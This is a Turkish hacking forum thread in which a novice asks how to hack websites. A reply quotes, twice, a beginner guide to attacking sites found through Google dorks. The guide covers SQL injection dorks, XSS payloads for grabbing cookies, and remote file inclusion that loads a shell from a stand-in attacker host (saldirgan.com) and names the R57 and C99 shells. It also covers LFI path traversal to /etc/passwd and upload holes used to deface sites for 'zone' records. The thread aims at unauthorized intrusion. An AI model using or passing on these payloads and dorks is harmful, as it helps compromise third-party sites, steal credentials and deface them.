Arkadaşlar Site Nasıl Hacklenir Biligisi Olan :) <3 (1 Viewer)

Ne Olur Bana Yrdım Et Nasıl Haclicez Bu Siteleri 2 Yıl Hacker Lik Yapıyom 1000 Tane Video İzledim 1 Tane Site Hackliymedim 😭😭😭 Yardım Ermisiniz

 

😭 😭 😭 🤬🤬🤬

 

@Dj_Taleh brom bu kutsal göreve seni atasak şu kardeşin elinden tutsan birşeyler öğretsen he brom olmaz mı ?

 

@Dj_Taleh brom bu kutsal göreve seni atasak şu kardeşin elinden tutsan birşeyler öğretsen he brom olmaz mı ?

Doğru Evt Olur Kabul Başlayalım

 

Doğru Evt Olur Kabul Başlayalım

Talehin bundan haberi varmı reis bi önce ona sor bakalım ne diyor

 

İşte Şimdi Sorucam

 

Yeni Baslangic Icin Yapman Gereken Sheyler
Once Dorklarla Ugrasmalisin..

Mesala :

phUploader Açıgı

Merhaba . Sade Yontemmiş. Googleya Girip Dork: Powered By phUploader Aratıyorsunuz . Sonra Resim Up Yapa Bilirsiniz ... DEMO: http://my.msk.co.com/uploads/1584630943.jpg ALINTIDIR ...

spyhackerz.org

Bak Kardes

 

SQL Açığı Nedir?

Günümüzde en çok olan açıktır. SQL web sitenin veritabanıdır. SQL açığı sayesinde bir web sitede ki tüm kullanıcıları alıp ister silip isterse bir şeyler ekleyebilirsiniz. Root pass alıp web sitenin admin paneline ulaşılabilir bu açık ile

SQL Açığı Dorkları

SQL açıklı siteleri bulmak için ve ya sitenin sql açığı bulmak için mesela index.php?id=3 bunu sitenin sonuna girerseniz ve hata verirse web sitesinde SQL açığı var demektir SQL Açık Dorkları ;

Kod:
inurl:index.php?id=
Bu dorkları yazıp id değerlerini girerseniz ve hata verirse SQL açığı demektir bu açıktan faydalanıp web sitenin tüm bilgilerini ele geçirebilirsiniz.

XSS (Cross Site Scripting) Açığı Nedir?

Günümüzde büyük firmalarda bile bulunan önemli ama bir o kadar da eski bir açıktır. Açığın bulunması kolaydır.
Peki bu açıkla ne yapabilirim? Bu açık kullanıcılar siteye kayıt ve ya giriş yapınca hesap bilgileri cookieslere kaydolunur ve bu açık ile cookiesleri çekip hatta admin hesabını da çekip siteye büyük bir zarar verebilirsiniz. Bu açık manuel şekilde bulunur ve bulunması ile kapatılması çok kolaydır. XSS açığı arama , galeri , kayıt , giriş , mesajlar , haberler ve yorumlar kısımlarında enjekte edip bulabilirsiniz. Peki XSS açığı manuel olarak bulma kodu nedir?

PHP için XSS açık kodu ;

< script>alert("hacklendin")</script>

Örnek ; http://www.hedefsite.com/arama.php?=< script>alert("hacklendin")</script>

ASP için XSS açık kodu ;

">< script>alert("hacklendin")</script>

Örnek ; http://www.hedefsite.com/arama.asp?=">< script>alert("hacklendin")</script>

Cookiesleri çekmek için kod ;

< script>alert (d o c u m e n t.cookie);</script>

Not = "d o c u m e n t" arasında boşluk olmayacak şekilde yazınız


XSS Açığı Bulma Dorkları

Kod:
inurl:search.php?ID=

RFI Açığı Nedir?

Sadece PHP de olan bir açık türüdür nedenini sorarsanız RFI açığını destekleyen kodlar PHP de bulunduğu için sadece orada bulunur. Günümüzde pek yaygın olmayan ve pek fazla karşılaşılmayan bir açık türü olan RFI Remote File Include'nin kısaltılmış halidir. Türkçesi ise Uzaktan dosya çekmektir.

RFI Açığı Örnek ; index2.php dosyası:
include(“$duyurular/guncel/duyuru.php”);
Bu satırdaki “$” işareti bulunan paramtreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
“http://www.hedef.com/index2.php?duyu...om/shell.txt?”
Yukarıdaki şekilde, http://saldirgan.com/shell.txt? adresinde bulunan zararlı kodlar www.hedef.com adresi üzerinde çalıştırılacaktır.

Bu aşamadan sonra shell sayesinde web siteye sızan kötü amaçlı korsan istediğini yapabilir bu aşamada genellikle en çok R57 , C99 shelleri kullanılır.


LFI Açığı Nedir?

Açılımı Local File İnclude dir siteye uzaktan dosya ekleme demektir Türkçe anlamı. LFI açığı ile bir siteye shell yükleyebilir ve ya root bilgilerini alabilirsiniz. Peki nasıl root bilgilerini alacağım? Öncelikle Mozilla Firefox'un yüklü olması lazım günümüzde fazla olmayan neredeyse bulunması imkansız gibi olan LFI açığı yakın zamanda tarihe karışabilir.


2 - Tamper Data Eklentisini yükleyelim.


Daha sonra bir LFI açığı dorkunu google yazıp bir siteye tıklıyoruz. Dorklar SQL açığı dorklarının aynısı olabilir ondan dolayı id numarasını silip yerine ../../../../../../etc/passwd
yazarsanız sitede ki rootun hesap bilgileri sizin elinize geçer.



Upload Açığı Nedir?

Upload açığı günümüzde zone kaydı kasmak için kullanılan çok basit bir açıktır. Web siteye zarar vermeyen bu açık attığınız html dosyasını sitenin dosyalarında bir yerde kaydeder ve bu linki alıp zone kaydı alıp zone kasabilirsiniz. Yapmanız gereken Google a upload açığı dorku yazarak çıkan yere html dosyanızı atıp upload butonuna tıklayıp dosyanın olduğu adrese gitmek.

Upload Açığı Dorkları

Kod:
inurl: uploadbutton.html

Bunlar örnek olarak ve en çok kaynak çıkan dorklardır tabii daha fazla dork vardır.
Örnek olarak ;

1 - Siteye girdikten sonra şu şekil bir ekran çıkıcaktır upload butonuna tıkladıktan sonra html dosyanızı atın ve çıkan linki alıp zone kaydı alın.

Alıntı

Bak başlangıç için güzel şeyler

 

SQL Açığı Nedir?

Günümüzde en çok olan açıktır. SQL web sitenin veritabanıdır. SQL açığı sayesinde bir web sitede ki tüm kullanıcıları alıp ister silip isterse bir şeyler ekleyebilirsiniz. Root pass alıp web sitenin admin paneline ulaşılabilir bu açık ile

SQL Açığı Dorkları

SQL açıklı siteleri bulmak için ve ya sitenin sql açığı bulmak için mesela index.php?id=3 bunu sitenin sonuna girerseniz ve hata verirse web sitesinde SQL açığı var demektir SQL Açık Dorkları ;

Kod:
inurl:index.php?id=
Bu dorkları yazıp id değerlerini girerseniz ve hata verirse SQL açığı demektir bu açıktan faydalanıp web sitenin tüm bilgilerini ele geçirebilirsiniz.

XSS (Cross Site Scripting) Açığı Nedir?

Günümüzde büyük firmalarda bile bulunan önemli ama bir o kadar da eski bir açıktır. Açığın bulunması kolaydır.
Peki bu açıkla ne yapabilirim? Bu açık kullanıcılar siteye kayıt ve ya giriş yapınca hesap bilgileri cookieslere kaydolunur ve bu açık ile cookiesleri çekip hatta admin hesabını da çekip siteye büyük bir zarar verebilirsiniz. Bu açık manuel şekilde bulunur ve bulunması ile kapatılması çok kolaydır. XSS açığı arama , galeri , kayıt , giriş , mesajlar , haberler ve yorumlar kısımlarında enjekte edip bulabilirsiniz. Peki XSS açığı manuel olarak bulma kodu nedir?

PHP için XSS açık kodu ;

< script>alert("hacklendin")</script>

Örnek ; http://www.hedefsite.com/arama.php?=< script>alert("hacklendin")</script>

ASP için XSS açık kodu ;

">< script>alert("hacklendin")</script>

Örnek ; http://www.hedefsite.com/arama.asp?=">< script>alert("hacklendin")</script>

Cookiesleri çekmek için kod ;

< script>alert (d o c u m e n t.cookie);</script>

Not = "d o c u m e n t" arasında boşluk olmayacak şekilde yazınız


XSS Açığı Bulma Dorkları

Kod:
inurl:search.php?ID=

RFI Açığı Nedir?

Sadece PHP de olan bir açık türüdür nedenini sorarsanız RFI açığını destekleyen kodlar PHP de bulunduğu için sadece orada bulunur. Günümüzde pek yaygın olmayan ve pek fazla karşılaşılmayan bir açık türü olan RFI Remote File Include'nin kısaltılmış halidir. Türkçesi ise Uzaktan dosya çekmektir.

RFI Açığı Örnek ; index2.php dosyası:
include(“$duyurular/guncel/duyuru.php”);
Bu satırdaki “$” işareti bulunan paramtreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
“http://www.hedef.com/index2.php?duyu...om/shell.txt?”
Yukarıdaki şekilde, http://saldirgan.com/shell.txt? adresinde bulunan zararlı kodlar www.hedef.com adresi üzerinde çalıştırılacaktır.

Bu aşamadan sonra shell sayesinde web siteye sızan kötü amaçlı korsan istediğini yapabilir bu aşamada genellikle en çok R57 , C99 shelleri kullanılır.


LFI Açığı Nedir?

Açılımı Local File İnclude dir siteye uzaktan dosya ekleme demektir Türkçe anlamı. LFI açığı ile bir siteye shell yükleyebilir ve ya root bilgilerini alabilirsiniz. Peki nasıl root bilgilerini alacağım? Öncelikle Mozilla Firefox'un yüklü olması lazım günümüzde fazla olmayan neredeyse bulunması imkansız gibi olan LFI açığı yakın zamanda tarihe karışabilir.


2 - Tamper Data Eklentisini yükleyelim.


Daha sonra bir LFI açığı dorkunu google yazıp bir siteye tıklıyoruz. Dorklar SQL açığı dorklarının aynısı olabilir ondan dolayı id numarasını silip yerine ../../../../../../etc/passwd
yazarsanız sitede ki rootun hesap bilgileri sizin elinize geçer.



Upload Açığı Nedir?

Upload açığı günümüzde zone kaydı kasmak için kullanılan çok basit bir açıktır. Web siteye zarar vermeyen bu açık attığınız html dosyasını sitenin dosyalarında bir yerde kaydeder ve bu linki alıp zone kaydı alıp zone kasabilirsiniz. Yapmanız gereken Google a upload açığı dorku yazarak çıkan yere html dosyanızı atıp upload butonuna tıklayıp dosyanın olduğu adrese gitmek.

Upload Açığı Dorkları

Kod:
inurl: uploadbutton.html

Bunlar örnek olarak ve en çok kaynak çıkan dorklardır tabii daha fazla dork vardır.
Örnek olarak ;

1 - Siteye girdikten sonra şu şekil bir ekran çıkıcaktır upload butonuna tıkladıktan sonra html dosyanızı atın ve çıkan linki alıp zone kaydı alın.

Alıntı

Bak başlangıç için güzel şeyler

Ayn İnşalah Çalışır Çünkü Üncedende SQL Denedim Ama Olmadı